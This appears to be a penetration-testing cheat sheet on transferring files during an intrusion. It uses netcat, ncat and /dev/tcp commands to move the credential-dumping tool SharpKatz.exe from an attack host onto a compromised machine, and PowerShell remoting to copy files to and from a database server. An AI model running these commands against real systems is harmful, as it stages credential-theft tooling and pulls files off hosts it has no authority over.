File Transfer with Netcat and Ncat
Netcat - Attack Host - Sending File to Compromised machine . The option -q 0 gonna close connection after transferring.
Copy # Using original netcat
victim$ nc -l -p 8000 > SharpKatz.exe
Copy attacker$ nc -q 0 13.13.13.13 8000 < SharpKatz.exe Ncat - Attack Host - Sending File to Compromised machine
Copy # Using Ncat
victim$ ncat -l -p 8000 --recv-only > SharpKatz.exe
Copy attacker$ ncat --send-only 13.13.13.13 8000 < SharpKatz.exe Sending File as Input to Netcat
Copy attacker$ sudo nc -l -p 443 -q 0 < SharpKatz.exe
Copy victim$ nc 13.13.13.13 443 > SharpKatz.exe Sending File as Input to Ncat
Copy attacker$ sudo ncat -l -p 443 --send-only < SharpKatz.exe
Copy victim$ ncat 13.13.13.13 443 --recv-only > SharpKatz.exe Sending File from Attacker machine to Compromised using /dev/tcp
Copy # Netcat option
attacker$ sudo nc -l -p 443 -q 0 < SharpKatz.exe
Copy # Ncat option
attacker$ sudo ncat -l -p 443 --send-only < SharpKatz.exe
Copy # Connecting to netcat using /dev/tcp
victim$
cat < /dev/tcp/13.13.13.13/443 > SharpKatz.exe PowerShell Session File Transfer
I know I used to show about PowerShell file transfers in Windows File Transfer section, but there are possibilities when no HTTP, HTTPS or SMB are available. So here we'll use PowerShell Remoting aka WinRM. Usually work on TCP/5985 port for HTTP and TCP/5986 port for HTTPS.
Check TCP 5985 Port on DATABASE01
Copy PS C:\carnifex17> Test-NetConnection -ComputerName DATABASE01 -Port 5985 Create a PowerShell Remoting Session to DATABASE01
Copy PS C:\Desktop> $Session = New-PSSession -ComputerName DATABASE01 Copy samplefile.txt from our Localhost to the DATABASE01 Session
Copy PS C:\Desktop> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ Copy DATABASE.txt from DATABASE01 Session to our Localhost
Copy PS C:\Desktop> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session Last updated 6 months ago
